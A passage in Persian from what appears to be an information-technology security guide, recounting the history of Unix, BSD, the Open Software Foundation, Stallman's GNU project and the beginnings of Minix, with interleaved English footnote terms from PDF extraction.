‫ﺩﺭﺣﺎﻟﻴﻜﻪ ‪ Multics‬ﺳﻌﻲ ﺩﺍﺷﺖ ﻛﺎﺭﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪ Unix ،‬ﺗﻼﺵ ﻣﻲﻛﺮﺩ ﻳﻚ ﻛﺎﺭ ﺭﺍ ﺧﻮﺏ ﺍﻧﺠـﺎﻡ ﺩﻫـﺪ‪ :‬ﺍﺟـﺮﺍﻱ ﺑﺮﻧﺎﻣـﻪﻫـﺎ‪.‬‬
‫"ﺍﻣﻨﻴﺖ ﻗﻮﻱ" ﺑﺨﺸﻲ ﺍﺯ ﺍﻳﻦ ﻫﺪﻑ ﻧﺒﻮﺩ‪ .‬ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﺑﺮﺍﺳﺎﺱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻓﺸﺮﺩﻩﺳﺎﺯﻱﺷﺪﻩ ﻣﻮﺳﻮﻡ ﺑﻪ ﺍﺑﺰﺍﺭﻫﺎ‪ ٥‬ﻛﺎﺭ ﻣﻲﻛﺮﺩ ﻛـﻪ ﻫﺮﻛـﺪﺍﻡ‬
‫ﻋﻤﻠﻴﺎﺕ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩﻱ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﺍﺩﻧـﺪ‪ .‬ﺷـﺮﻛﺖ ﺗﻠﻔـﻦ ﻭ ﺗﻠﮕـﺮﺍﻑ ﺁﻣﺮﻳﻜـﺎ )‪ ٦(AT&T‬ﺩﺭ ﺧـﻼﻝ ﺳـﺎﻟﻬﺎﻱ ﺩﻫـﺔ ‪ ۱۹۷۰‬ﺍﺑﺰﺍﺭﻫـﺎ ﻭ‬
‫ﻭﻳﮋﮔﻴﻬﺎﺋﻲ ﺑﻪ ﺁﻥ ﺍﺿﺎﻓﻪ ﻛﺮﺩ‪ .‬ﺩﺭ ﺳﺎﻝ ‪ ۱۹۷۳‬ﺗﺎﻣﺴﻮﻥ‪ ٧‬ﺑﻴﺸﺘﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ Unix‬ﺭﺍ ﺑﻪ ﺯﺑﺎﻥ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ‪ C‬ﻛﻪ ﺭﻳﭽﻲ‪ ٨‬ﺑﻪ ﺗـﺎﺯﮔﻲ ﺁﻧـﺮﺍ‬
‫ﺍﺑﺪﺍﻉ ﻛﺮﺩﻩﺑﻮﺩ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻛﺮﺩ‪ .‬ﺯﺑﺎﻥ ‪ C‬ﻃﻮﺭﻱ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩ ﻛﻪ ﻳﻚ ﺯﺑﺎﻥ ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺴﻲ ﺳﺎﺩﻩ ﻭ ﺟﺎﺑﺠﺎﻳﻲﭘـﺬﻳﺮ ﺑﺎﺷـﺪ‪ .‬ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﺑﻪ ﺯﺑﺎﻥ ‪ C‬ﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﺑﻪ ﺳﺎﺩﮔﻲ ﺍﺯ ﻳﻚ ﻧـﻮﻉ ﺭﺍﻳﺎﻧـﻪ ﺑـﻪ ﻧـﻮﻉ ﺩﻳﮕـﺮ ﻣﻨﺘﻘـﻞ ﺷـﻮﻧﺪ‪ ،‬ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﺍﻳﻨﻜـﺎﺭ ﺩﺭ ﺯﺑﺎﻧﻬـﺎﻱ‬

‫‪2‬‬ ‫‪Logs‬‬
‫‪3‬‬ ‫‪Desktop Unix‬‬
‫‪4‬‬ ‫‪Multilevel Security‬‬
‫‪5‬‬ ‫‪Tools‬‬
‫‪6‬‬ ‫‪American Telephone & Telegraph‬‬
‫‪7‬‬ ‫‪Thompson‬‬
‫‪8‬‬ ‫‪Ritchie‬‬
‫‪٢٥٩‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﺳﻄﺢ ﺑﺎﻻ ﻣﺜﻞ ‪ Fortran‬ﺍﻧﺠﺎﻡﭘﺬﻳﺮ ﺑﻮﺩ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺗﻘﺮﻳﺒﹰﺎ ﺑﺎ ﺳﺮﻋﺖ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑﻪ ﺯﺑﺎﻥ ﺑـﻮﻣﻲ‬
‫ﻣﺎﺷﻴﻦ ﻛﺪﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﻧﺪ ﺍﺟﺮﺍ ﻣﻲﺷﺪﻧﺪ‪ .‬ﺗﺎ ﺳﺎﻝ ‪ ۱۹۷۷‬ﺑﻴﺶ ﺍﺯ ‪ ۵۰۰‬ﺍﺩﺍﺭﻩ ﺍﺯ ﺑﺮﻧﺎﻣﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻧﺪ؛ ‪ ۱۲۵‬ﺍﺩﺍﺭﻩ ﻋﺒﺎﺭﺕ‬
‫ﺑﻮﺩﻧﺪ ﺍﺯ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻭ ﺑﻴﺶ ﺍﺯ ‪ ۱۰‬ﻛﺸﻮﺭ ﺧﺎﺭﺟﻲ ﺩﻳﮕﺮ‪.‬‬
‫ﺗﻮﺳﻌﻪ ﺩﺭ ﻧﻘﺎﻁ ﻣﺨﺘﻠﻔﻲ ﺍﺩﺍﻣﻪ ﻳﺎﻓﺖ؛ ﺍﺯ ﺟﻤﻠﻪ ﺩﺍﻧﺸﮕﺎﻩ ﻛﺎﻟﻴﻔﺮﻧﻴﺎ ﺩﺭ ﺑﺮﻛﻠﻲ‪ ،‬ﻛـﻪ ﮔـﺴﺘﺮﺵ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺑﺮﻛﻠـﻲ )‪ - ٩(BSD‬ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﺗﻐﻴﻴﺮﺍﺕ ﺩﺭ ﺳﻴﺴﺘﻢ ‪ - Unix‬ﺭﺍ ﻣﻨﺘﺸﺮ ﻛﺮﺩ‪ .‬ﺩﺭ ‪ ۶‬ﺳﺎﻝ ﺑﻌﺪﻱ‪ ،‬ﺩﺭ ﻓﻌﺎﻟﻴﺘﻲ ﻛﻪ ﺗﻮﺳﻂ ‪ ARPA‬ﺭﻭﻱ ﺁﻥ ﺳﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻱ ﺷـﺪ‪،‬‬
‫ﺁﻧﭽﻪ ﺗﺎ ﺁﻧﺰﻣﺎﻥ ‪ BSD Unix‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﺪ ﺗﺎ ﺣﺪ ﻭ ﺍﻧﺪﺍﺯﻩﻫﺎﻱ ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﺴﺘﻘﻞ ﺭﺷﺪ ﻛﺮﺩ ﻭ ﺑﺎﻋﺚ ﺍﺻﻼﺣﺎﺕ ﭼـﺸﻤﮕﻴﺮﻱ ﺩﺭ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ AT&T‬ﺷﺪ‪ .‬ﺷﺎﻳﺪ ﻣﻬﻤﺘﺮﻳﻦ ﺍﺻﻼﺣﺎﺕ ﺑﺮﻛﻠﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﺷﺒﻜﻪ ﺑﻮﺩ‪ ،‬ﻛﻪ ﺍﺗﺼﺎﻝ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ‪ Unix‬ﺭﺍ ﺑﻪ ﺷﺒﻜﻪﻫـﺎﻱ ﻣﺤﻠـﻲ‬
‫)‪LAN‬ﻫﺎ(‪ ١٠‬ﺁﺳﺎﻥ ﻣﻲﻛﺮﺩ‪ .‬ﺑﻪ ﻫﻤﻪ ﺍﻳﻦ ﺩﻻﻳﻞ‪ Unix ،‬ﻧﺴﺨﺔ ﺑﺮﻛﻠﻲ ﺩﺭ ﺟﻮﺍﻣ ﹺﻊ ﺗﺤﻘﻴﻘﺎﺗﻲ ﻭ ﻋﻠﻤﻲ ﺭﻭﺍﺝ ﺑﺴﻴﺎﺭ ﭘﻴﺪﺍ ﻛﺮﺩ‪.‬‬
‫ﺩﺭ ﺍﻭﺍﺧﺮ ﺳﺎﻟﻬﺎﻱ ‪ ۱۹۸۰‬ﺯﻣﺎﻧﻴﻜﻪ ‪ Unix‬ﺍﺯ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﻓﻨﻲ ﺑـﻪ ﺑﺎﺯﺍﺭﻫـﺎﻱ ﺗﺠـﺎﺭﻱ ﺭﺍﻩ ﭘﻴـﺪﺍ ﻛـﺮﺩ‪ ،‬ﻧﺎﺳـﺎﺯﮔﺎﺭﻳﻬﺎﻱ ﻣﻴـﺎﻥ ﻧـﺴﺨﻪﻫـﺎﻱ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ AT&T Unix‬ﻭ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ BSD Unix‬ﺷﺮﻭﻉ ﺑﻪ ﺍﻳﺠﺎﺩ ﻣﺸﻜﻼﺕ ﺑﺮﺍﻱ ﻫﻤﺔ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻧﻤﻮﺩ‪ .‬ﻣﺸﺘﺮﻳﺎﻥ‬
‫ﺗﺠﺎﺭﻱ ﺧﻮﺍﻫﺎﻥ ﻳﻚ ﻧﺴﺨﻪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ‪ Unix‬ﺑﻮﺩﻧﺪ‪ ،‬ﺑﻪ ﺍﻳﻦ ﺍﻣﻴﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺁﻣـﻮﺯﺵ ﺭﺍ ﻛـﺎﻫﺶ ﺩﻫﻨـﺪ ﻭ ﻗﺎﺑﻠﻴـﺖ ﺟﺎﺑﺠـﺎﻳﻲ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺳﺎﺧﺘﻪﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﻓﺮﻭﺷﻨﺪﻩﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺭﺍ ﺗﻀﻤﻴﻦ ﻛﻨﻨﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﺑـﺎﺯﺍﺭ ﻧﻮﻇﻬـﻮﺭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ‬
‫‪ Unix‬ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﻲﻃﻠﺒﻴﺪ‪ ،‬ﭼﻮﻥ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺑﺎﻭﺭ ﺩﺍﺷﺘﻨﺪ ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﭘﺸﺘﻴﺒﺎﻧ ﹺ‬
‫ﻲ ﺑﺴﺘﺮﻫﺎﻱ ﭼﻨﺪﮔﺎﻧﻪ ﺭﺍ ﺑﺮﺍﻱ ﺁﻧﻬﺎ ﺳﺎﺩﻩﺗـﺮ ﻣـﻲﻛﻨـﺪ ﻭ‬
‫ﻫﻤﭽﻨﻴﻦ ﺑﺎ ﺑﺎﺯﺍﺭ ﺭﻭ ﺑﻪ ﺭﺷﺪ ﻣﺒﺘﻨﻲ ﺑﺮ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺭﻗﺎﺑﺖ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬
‫ﺩﺭ ﻣﺎﻩ ﻣﻲ ‪ ،۱۹۸۸‬ﻫﻔﺖ ﺷﺮﻛﺖ ﭘﻴﺸﺮﻭ ﺩﺭ ﺻﻨﻌﺖ ‪ - Unix‬ﺭﺍﻳﺎﻧﻪ ﺁﭘﻮﻟﻮ‪ ،١١‬ﺷﺮﻛﺖ ﺗﺠﻬﻴﺰﺍﺕ ﺩﻳﺠﻴﺘﺎﻟﻲ‪ ،١٢‬ﻫﻴﻮﻟﺖ ﭘﺎﻛﺎﺭﺩ )‪،IBM ،١٣(HP‬‬
‫‪١٤‬‬
‫ﻭ ﺳﻪ ﺷﺮﻛﺖ ﺍﺻﻠﻲ ﺍﺭﻭﭘﺎﻳﻲ ﺳﺎﺯﻧﺪﻩ ﻛﺎﻣﭙﻴﻮﺗﺮ ‪ -‬ﺗﺸﻜﻴﻞ ﺑﻨﻴﺎﺩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﺎﺯ )‪ (OSF‬ﺭﺍ ﺍﻋﻼﻡ ﻛﺮﺩﻧﺪ‪ .‬ﻫﺪﻑ ‪ OSF‬ﺑﻴـﺮﻭﻥ ﺁﻭﺭﺩﻥ ‪Unix‬‬
‫ﺍﺯ ﻛﻨﺘﺮﻝ ‪ AT&T‬ﻭ ﻗﺮﺍﺭﺩﺍﺩﻥ ﺁﻥ ﺩﺭ ﺩﺳﺘﺎﻥ ﻳﻚ ﺍﺋﺘﻼﻑ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﺻﻨﻌﺘﻲ ﺑﻮﺩ‪ ،‬ﻛﻪ ﺑﺎ ﻫﺪﺍﻳﺖ ﺗﻮﺳﻌﺔ ‪ Unix‬ﺩﺭ ﺁﻳﻨـﺪﻩ ﻭ ﺩﺭ ﺩﺳـﺘﺮﺱ‬
‫ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﺁﻥ ﺑﺮﺍﻱ ﻋﻤﻮﻡ ‪ -‬ﺗﺤﺖ ﻳﻚ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ ﻭﺍﺣـﺪ ‪ -‬ﺭﻫﺒـﺮﻱ ﻣـﻲﺷـﺪ‪ OSF .‬ﺗـﺼﻤﻴﻢ ﮔﺮﻓـﺖ ﭘﺎﻳـﺔ ‪ Unix‬ﺧـﻮﺩ ﺭﺍ ﺑﺮﺍﺳـﺎﺱ‬
‫‪١٦‬‬ ‫‪١٥‬‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ‪ IBM‬ﻗﺮﺍﺭ ﺩﻫﺪ‪ ،‬ﭘﺲ ﺑﻪ ﺳﻤﺖ ﻫﺴﺘﺔ ‪ Unix‬ﻣﺎﺥ ﺍﺯ ﺩﺍﻧﺸﮕﺎﻩ ﻛﺎﺭﻧﻲ ﻣﻠﻮﻥ ‪ ،‬ﻛﻪ ﺁﻣﻴﺰﻩﺍﻱ ﺍﺯ ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎ ﻭ ﺗﺴﻬﻴﻼﺕ ‪HP‬‬
‫ﻭ ‪ IBM‬ﻭ ﺷﺮﻛﺖ ﺗﺠﻬﻴﺰﺍﺕ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻮﺩ ﺣﺮﻛﺖ ﻛﺮﺩ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﻧﺘﻴﺠﺔ ﺍﻳﻦ ﻓﻌﺎﻟﻴﺘﻬﺎ ﻣﻮﺭﺩ ﭘﺬﻳﺮﺵ ﻭ ﺍﺳﺘﻘﺒﺎﻝ ﮔﺴﺘﺮﺩﻩ ﻭﺍﻗـﻊ ﻧـﺸﺪ‪،‬‬
‫‪ OSF‬ﺑﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺑﻴﺸﺘﺮ ﺗﻮﺳﻌﻪﺍﻱ ﺍﺩﺍﻣﻪ ﺩﺍﺩ‪.‬‬

‫‪GNU‬‬
‫ﺭﻳﭽﺎﺭﺩ ﺍﺳﺘﺎﻟﻤﻦ‪ ١٧‬ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﭘﺮﻭﮊﻩ ‪ LISP‬ﺩﺭ ﺁﺯﻣﺎﻳﺸﮕﺎﻩ ﻫﻮﺵ ﻣﺼﻨﻮﻋﻲ ﺩﺍﻧﺸﮕﺎﻩ ﻭﻗﺘـﻲ ﺩﻳـﺪ ﺷـﺮﻛﺘﻬﺎﻳﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﺑـﻪ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﺭﺳﺎﻧﺪﻥ ﺗﺤﻘﻴﻘﺎﺕ ﺗﺄﺳﻴﺲ ﺷﺪﻩﺑﻮﺩﻧﺪ ﻗﻮﺍﻧﻴﻨﻲ ﺭﺍ ﭘﺬﻳﺮﻓﺘﻨﺪ ﻛﻪ ﻣﺎﻧﻊ ﺑﻪ ﺍﺷﺘﺮﺍﻙﮔﺬﺍﺭﻱ ﺭﺍﻳﮕﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﻮﺩ ﺑﺴﻴﺎﺭ ﻧﺎﺭﺍﺣـﺖ ﺷـﺪ‪ .‬ﺍﺳـﺘﺎﻟﻤﻦ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻣﺘﻮﺟﻪ ﺷﺪ ﻛﻪ ﺍﮔﺮ ﺑﺨﻮﺍﻫﺪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﻮﺩ ﺭﺍ ﻣﻴﺎﻥ ﮔﺮﻭﻩ ﺑﺰﺭﮔﻲ ﺍﺯ ﻣﺮﺩﻡ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﺩ‪ ،‬ﻧﻤﻲﺗﻮﺍﻧﺪ ﺍﺳـﺎﺱ ﺍﻳﻨﻜـﺎﺭ ﺭﺍ ﺑـﺮ ﺳـﺨﺖﺍﻓـﺰﺍﺭ‬
‫ﺧﺎﺻﻲ ﻛﻪ ﺗﻨﻬﺎ ﺗﻮﺳﻂ ﺗﻌﺪﺍﺩ ﻛﻤﻲ ﺍﺯ ﻛﺎﺭﺧﺎﻧﻪﻫﺎﻱ ﺳﺎﺯﻧﺪﻩ ﺳﺎﺧﺘﻪ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﻭ ﺗﻨﻬﺎ ‪ LIPS‬ﺭﺍ ﺍﺟﺮﺍ ﻣﻲﻛﺮﺩﻧﺪ ﭘﺎﻳﻪﮔـﺬﺍﺭﻱ ﻛﻨـﺪ‪ .‬ﻟـﺬﺍ ﺑـﻪ‬
‫ﺟﺎﻱ ﺍﻳﻨﻜﺎﺭ ﺍﻭ ﺗﺼﻤﻴﻢ ﮔﺮﻓﺖ ﺍﻧﺠﻤﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺟﺪﻳﺪﻱ ﺭﺍ ﺑﺮﺍﺳﺎﺱ ‪ ،Unix‬ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻗﺪﺭﺗﻤﻨﺪ ﻛﻪ ﻣﺸﺎﺑﻪ ﺳﻴﺴﺘﻢ ﻗﺒﻠـﻲ ﻭ ﻧﻴـﺰ‬
‫ﺁﻳﻨﺪﻩﺩﺍﺭ ﺑﻮﺩ ﭘﺎﻳﻪﺭﻳﺰﻱ ﻛﻨﺪ‪ .‬ﺍﻭ ﻃﺮﺡ ﺧﻮﺩ ﺭﺍ ‪ GNU‬ﻧﺎﻣﻴﺪ؛ ﻳﻚ ﻣﺨﻔﻒ ﺑﺎﺯﮔﺸﺘﻲ ﺍﺯ ﻋﺒﺎﺭﺕ "‪ Unix GNU‬ﻧﻴـﺴﺖ"!‪ ١٨‬ﺍﺯ ﻧﻈـﺮ ﺍﺳـﺘﺎﻟﻤﻦ‬
‫ﺭﺍﻳﮕﺎﻥ ﺑﻮﺩﻥ ﺗﻨﻬﺎ ﻣﻌﻴﺎﺭ ﻫﺰﻳﻨﻪ ﻧﺒﻮﺩ‪ ،‬ﺑﻠﻜﻪ ﻳﻚ ﻣﻌﻴﺎﺭ ﺁﺯﺍﺩﻱ ﻫﻢ ﺑﻮﺩ‪ .‬ﺁﺯﺍﺩ ﺑﻮﺩﻥ ﺑﻪ ﺍﻳﻦ ﻣﻔﻬﻮﻡ ﺑﻮﺩ ﻛﻪ ﺍﻭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺖ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣـﻪ ﺭﺍ‬

‫‪9‬‬ ‫‪Berkeley Software Distribution‬‬


‫‪10‬‬ ‫‪Local Area Networks‬‬
‫‪11‬‬ ‫‪Apollo Computer‬‬
‫‪12‬‬ ‫‪Digital Equipment Corporation‬‬
‫‪13‬‬ ‫‪Hewlett Packard‬‬
‫‪14‬‬ ‫‪Open Software Foundation‬‬
‫‪15‬‬ ‫‪Mach‬‬
‫‪16‬‬ ‫‪Carnegie Mellon University‬‬
‫‪17‬‬ ‫‪Richard Stallman‬‬
‫‪18‬‬ ‫‪GNU's Not Unix‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٦٠‬‬

‫ﺑﺎﺯﺑﻴﻨﻲ ﻛﻨﺪ ﻭ ﺩﺭ ﺁﻥ ﺍﻋﻤﺎﻝ ﺗﻐﻴﻴﺮﺍﺕ ﻧﻤﺎﻳﺪ ﻭ ﻫﻤﭽﻨﻴﻦ ﺁﺯﺍﺩ ﺑﺎﺷﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﻧﺴﺨﻪﻫﺎﻳﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﻣﻴﺎﻥ ﺩﻭﺳﺘﺎﻧﺶ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﺑﮕـﺬﺍﺭﺩ‪.‬‬
‫ﺍﻭ ﺁﺯﺍﺩﻱ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﺁﻧﮕﻮﻧﻪ ﻣﻲﺧﻮﺍﺳﺖ ﻛﻪ ﺩﺭ ﺁﺯﺍﺩﻱ ﺑﻴﺎﻥ ﻣﻄﺮﺡ ﺍﺳﺖ‪ ،‬ﻧﻪ ﺩﺭ ﺁﺯﺍﺩﻱ ﻣﺸﺮﻭﺑﺎﺕ ﺍﻟﻜﻠﻲ‪ .‬ﺗﺎ ﺳـﺎﻝ ‪ ۱۹۸۵‬ﺍﻭﻟـﻴﻦ ﻣﺤـﺼﻮﻝ‬
‫ﻋﻤﺪﺓ ‪ - GNU‬ﻭﻳﺮﺍﻳﺸﮕﺮ ﻣﺘﻦ ‪ - Emacs‬ﺑﻪ ﻧﻘﻄﻪﺍﻱ ﺍﺯ ﺭﺷﺪ ﺭﺳﻴﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺴﺖ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﺩﻳﮕـﺮﻱ ﻏﻴـﺮ ﺍﺯ ﺍﺳـﺘﺎﻟﻤﻦ ﻫـﻢ ﺑـﻪ‬
‫ﺭﺍﺣﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ‪ .‬ﺑﻌﺪ ﺍﺯ ﺁﻥ ﺍﺳﺘﺎﻟﻤﻦ ﻛﺎﺭ ﺭﻭﻱ ﻳﻚ ﻛﺎﻣﭙﺎﻳﻠﺮ ﺁﺯﺍﺩ ‪ C‬ﺭﺍ ﺷﺮﻭﻉ ﻛﺮﺩ؛ ‪ .GNU C‬ﻫﺮﺩﻭﻱ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺗﺤﺖ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ‬
‫ﻋﻤﻮﻣﻲ ‪ ١٩(GPL) GNU‬ﺍﺳﺘﺎﻟﻤﻦ ﺗﻮﺯﻳﻊ ﺷﺪﻧﺪ‪ .‬ﺍﻳﻦ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ‪ ،‬ﺑﻪ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﺣﻖ ﺍﻧﺘﺸﺎﺭ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﻭ ﺍﻋﻤﺎﻝ ﺗﻐﻴﻴﺮﺍﺕ ﺷﺨﺼﻲ ﺭﺍ‬
‫ﻣﻲﺩﺍﺩ‪ ،‬ﻣﺸﺮﻭﻁ ﺑﺮ ﺁﻧﻜﻪ ﻫﻤﺔ ﺗﻐﻴﻴﺮﺍﺕ ﺁﺗﻲ ﺩﺭ ﺑﺮﻧﺎﻣﻪ‪ ،‬ﺗﺤﺖ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﻫﻤﺎﻥ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﻗﺒﻠﻲ ﻣﻨﺘﺸﺮ ﺷـﻮﻧﺪ‪ .‬ﻫﻤـﺎﻥ ﺳـﺎﻝ ﺍﺳـﺘﺎﻟﻤﻦ‬
‫ﺑﻨﻴﺎﺩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺁﺯﺍﺩ‪ ٢٠‬ﺭﺍ ﺗﺄﺳﻴﺲ ﻛﺮﺩ؛ ﺑﻨﻴﺎﺩﻱ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﻛﻪ ﻫﺪﺍﻳﺎﻱ ﻣﺮﺩﻣﻲ ﺭﺍ ﺟﻤﻊﺁﻭﺭﻱ ﻣﻲﻛﺮﺩ ﻭ ﺑﺮﺍﻱ ﺍﺳﺘﺨﺪﺍﻡ ﺑﺮﻧﺎﻣﻪﻧﻮﻳـﺴﺎﻧﻲ ﻛـﻪ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﺎ ﻗﺎﺑﻠﻴﺖ ﺍﻧﺘﺸﺎﺭ ﻣﺠﺪﺩ ﻣﻲﻧﻮﺷﺘﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﻮﺩ‪.‬‬

‫‪ Unix‬ﻭ ‪Minix‬‬

‫ﺗﻘﺮﻳﺒﹰﺎ ﺩﺭ ﻫﻤﺎﻥ ﺯﻣﺎﻧﻲ ﻛﻪ ﺍﺳﺘﺎﻟﻤﻦ ﭘﺮﻭﮊﺓ ‪ GNU‬ﺭﺍ ﺷﺮﻭﻉ ﻛﺮﺩ‪ ،‬ﭘﺮﻭﻓﺴﻮﺭ ﺍﻧﺪﺭﻭ ﺍﺱ‪ .‬ﺗﺎﻧﻨﺒﺎﻡ‪ ٢١‬ﺗﺼﻤﻴﻢ ﮔﺮﻓـﺖ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺧـﻮﺩﺵ ﺍﺯ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ Unix‬ﺭﺍ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺗﺪﺭﻳﺲ ﻭ ﺗﺤﻘﻴﻖ ﭘﺪﻳﺪ ﺁﻭﺭﺩ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻫﻤﺔ ﺑﺮﻧﺎﻣﻪ ﺍﺯ ﺍﺑﺘﺪﺍ ﻧﻮﺷﺘﻪ ﻣﻲﺷﺪ ﺍﻭ ﻣﻲﺗﻮﺍﻧﺴﺖ ﺁﺯﺍﺩﺍﻧﻪ‬
‫ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺩﺭ ﻛﺘﺎﺏ ﺩﺭﺳﻲ ﺧﻮﺩ ﻣﻨﺘﺸﺮ ﻭ ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻋﻤﻠﻴﺎﺗﻲ ﺭﺍ ﺗﻮﺯﻳﻊ ﻛﻨﺪ‪ ،‬ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﺣﻖ ﺍﻣﺘﻴـﺎﺯﻱ ﺑـﻪ ‪ AT&T‬ﭘﺮﺩﺍﺧـﺖ‬
‫ﻧﻤﺎﻳﺪ‪ .‬ﺍﻳﻦ ﺳﻴﺴﺘﻢ‪ ،Minix ،‬ﺑﺮ ﺍﺳﺎﺱ ﻧﻤﻮﻧﻪﻫﺎﻱ ﻣﺸﺎﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ‪ IBM PC AT‬ﻋﻤﻞ ﻣﻲﻛﺮﺩ ﻭ ﺑﻪ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎﻱ ﻣﺒﺘﻨـﻲ‬
